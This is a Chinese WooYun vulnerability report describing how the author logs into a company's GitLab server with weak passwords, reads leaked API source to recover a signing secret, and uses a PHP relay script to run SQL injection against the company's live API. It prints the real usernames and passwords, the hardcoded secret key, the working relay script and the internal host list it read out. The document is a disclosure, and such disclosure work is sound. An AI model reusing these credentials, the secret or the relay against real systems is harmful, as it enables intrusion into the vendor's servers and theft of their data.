当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0215977

漏洞标题:北京黑米git弱口令导致SQL注入(参数签名中转注射案例)

相关厂商:747.cn

漏洞作者: scanf

提交时间:2016-06-03 19:31

修复时间:2016-07-09 16:30

公开时间:2016-07-09 16:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-06-03: 细节已通知厂商并且等待厂商处理中
2016-06-03: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-07-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

.

详细说明:

http://git.747.cn/users/sign_in 跑了一下
zhangxuan 123456
还有个管理员权限的 liuchao 123456
可以添加用户和添加进项目小组里面
泄漏各种项目源码

QQ截图20160603190737.jpg


QQ截图20160603190720.jpg


QQ截图20160603190744.jpg


http://git.747.cn/zhangxuan/heimilink_api/blob/master/heimi_api%20interface.txt
发现了一个这个文档 结合前面提交的注入觉得一定有注入.
由于其他的要验证登录了没有就只有第4个了
4. 获取用户渠道编号
访问地址: 根域名 + /user/info/getchannelid?hm_uid=[用户ID]&hm_dateline=[时间截]&hm_sign=[数字签名]
签名生成方法:
$sign = sha1( 用户ID . SEC秘钥 . 时间截) ;
示例: http://hmapi.showboom.cn/user/info/getchannelid?hm_uid=17&hm_dateline=1453345011&hm_sign=e9ed25d7cb259a4ed9eb1df1aaddeaa150622072
嗯 hm_uid hm_dateline知道
SECSEC秘钥在php里面
http://git.747.cn/zhangxuan/heimilink_api/blob/master/application/modules/User/controllers/Info.php
加密算法知道了
我们写个脚本

QQ截图20160603185421.jpg


QQ截图20160603185504.jpg


嗯存在注入
写个中转吧.

漏洞证明:

<?php
$SEC = '0d70d259cd54875a44654f5e856df327';
$userid = stripslashes($_GET['userid']);
$dateline= '1453345011';
$sign = sha1( $userid . $SEC . $dateline) ;
$uri = 'https://hmapi.showboom.cn/user/info/getchannelid?hm_uid='.$userid.'&hm_dateline=1453345011&hm_sign='.$sign;
$header = array();
$ch = curl_init ();
curl_setopt ( $ch, CURLOPT_URL, $uri );
curl_setopt ( $ch, CURLOPT_HEADER, 1 );
curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, 1 );
//https
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch,CURLOPT_HTTPHEADER,$header);
$return = curl_exec ( $ch );
curl_close ( $ch );
{echo $return;}
?>


user

QQ截图20160603190050.jpg


读取/etc/hosts

127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
10.0.2.251 a1801
10.0.2.10 a1802
10.0.2.11 a1803
10.0.2.12 a1804
10.0.2.13 a1805
10.0.2.14 a1806
10.0.2.15 a1807
10.0.2.16 a1808
10.0.2.17 a1809
10.0.2.18 a1810
10.0.3.10 a1701
10.0.3.11 a1702
10.0.3.12 a1703
10.0.3.13 a1704
10.0.3.14 a1705
10.0.3.15 a1706
10.0.3.16 a1707
10.0.3.17 a1708
10.0.3.18 a1709
10.0.3.19 a1710
10.0.3.20 a1711
10.0.3.21 a1712
10.0.2.19 a1602
10.0.2.20 a1603
10.0.2.6 a1604
10.0.2.8 a1605
10.0.2.7 a1606
10.0.2.21 a1607
10.0.2.22 a1608
10.0.2.23 a1609
10.0.2.24 a1610
10.0.2.25 a1611
10.0.3.51 a1501
10.0.3.52 a1502
10.0.3.53 a1503
10.0.3.54 a1504
10.0.3.55 a1505
10.0.3.56 a1506
10.0.3.57 a1507
10.0.3.58 a1508
10.0.3.59 a1509


内网服务器好多.

QQ截图20160603190503.jpg


修复方案:

额 看了一下源码发现几乎都没有过滤或者参数化查询语句.

版权声明:转载请注明来源 scanf@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-07-09 16:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2016-06-04 12:27 | 窝窝哥 ( 实习白帽子 | Rank:88 漏洞数:32 | 没WB啊啊啊啊!)

    然后他送了个WiFi盒子给你还是3G的那种。。。。